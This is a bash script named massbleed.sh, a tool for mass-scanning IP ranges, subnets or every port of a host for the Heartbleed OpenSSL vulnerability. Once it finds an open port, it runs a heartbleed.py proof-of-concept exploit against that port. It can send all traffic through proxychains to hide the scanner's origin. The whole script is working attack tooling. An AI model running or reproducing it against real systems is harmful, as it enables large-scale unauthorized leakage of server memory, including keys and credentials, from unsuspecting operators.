#!/bin/bash # massbleed.sh 20140423 by 1N3 # http://treadstonesecurity.blogspot.ca # Usage: sh massbleed.sh [port] [proxy] # # This script has four main functions with the ability to proxy all connections: # 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh # 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh port 8443) # 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh single) # 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) # # PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. # USAGE EXAMPLES: # (example: sh massbleed.sh 0 0 proxy) # (example: sh massbleed.sh port 8443 proxy) # (example: sh massbleed.sh single 0 proxy) # (example: sh massbleed.sh 192.168.0. subnet 0 proxy) # # Prerequisites: # Is the heartbleed POC present? # Is unicornscan installed? # Is nmap installed? echo "(--==== http://treadstonesecurity.blogspot.ca" echo "(--==== massbleed.sh 20140423 by 1N3" echo "" HEARTBLEED=`ls heartbleed.py` UNICORNSCAN=`which unicornscan` NMAP=`which nmap` RANGE=$1 ALL_PORTS=$2 CUSTOM_PORT=$3 PROXY=$4 PORT_RANGE="1-65000" if [ "$HEARTBLEED" != "heartbleed.py" ]; then echo "(--==== heartbleed.py not found!" echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py" exit fi if [ "$UNICORNSCAN" == "" ]; then echo "(--==== unicornscan not installed! Exiting..." exit fi if [ "$NMAP" == "" ]; then echo "(--==== nmap not installed! Exiting..." exit fi if [ -z "$1" ]; then echo "(--==== usage: $0 [port] [proxy]" exit fi if [ "$PROXY" = "proxy" ]; then echo "(--==== scanning via proxy..." if [ "$ALL_PORTS" = "single" ]; then if [ "$CUSTOM_PORT" != "0" ]; then echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null else for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; done; fi fi if [ "$ALL_PORTS" = "subnet" ]; then for a in {1..254}; do echo "Scanning: $RANGE$a" for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; do echo "$RANGE$a:$b" proxychains python heartbleed.py $RANGE$a -p $b | grep Server; done; done; fi if [ "$ALL_PORTS" = "port" ]; then for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; done; else for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server; done fi else if [ "$ALL_PORTS" = "single" ]; then for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; done; fi if [ "$ALL_PORTS" = "subnet" ]; then for a in {1..254}; do echo "Scanning: $RANGE$a" for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; do echo "$RANGE$a:$b" python heartbleed.py $RANGE$a -p $b | grep Server; done; done; fi if [ "$ALL_PORTS" = "port" ]; then for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; done; else for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server; done fi fi echo "(--==== scan complete!" exit